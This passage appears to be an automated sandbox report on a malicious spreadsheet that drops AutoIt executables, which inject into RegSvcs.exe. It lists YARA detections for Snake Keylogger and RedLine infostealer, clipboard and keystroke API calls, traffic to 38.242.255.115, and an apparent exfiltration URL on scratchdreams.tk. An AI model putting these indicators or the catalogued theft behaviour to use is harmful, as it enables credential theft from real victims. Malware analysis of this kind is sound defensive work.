Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_00B8EAFF

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00B8ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	8_2_0106ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	11_2_013AED6A

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B8EAFF

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

5_2_00B7AA57

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01089576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		8_2_01089576
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		11_2_013C9576

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE	Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dafd640f-6
Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd735227-d
Source: negrett.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_59ed402a-6
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e6e71942-0
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8a996c3d-f
Source: negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_2f1f07c6-2
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ef89f19f-6
Source: name.exe, 00000008.00000000.773844640.00000000010B2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c6b2ebc5-6
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_55d6bc35-1
Source: name.exe, 0000000B.00000002.817199516.00000000013F2000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 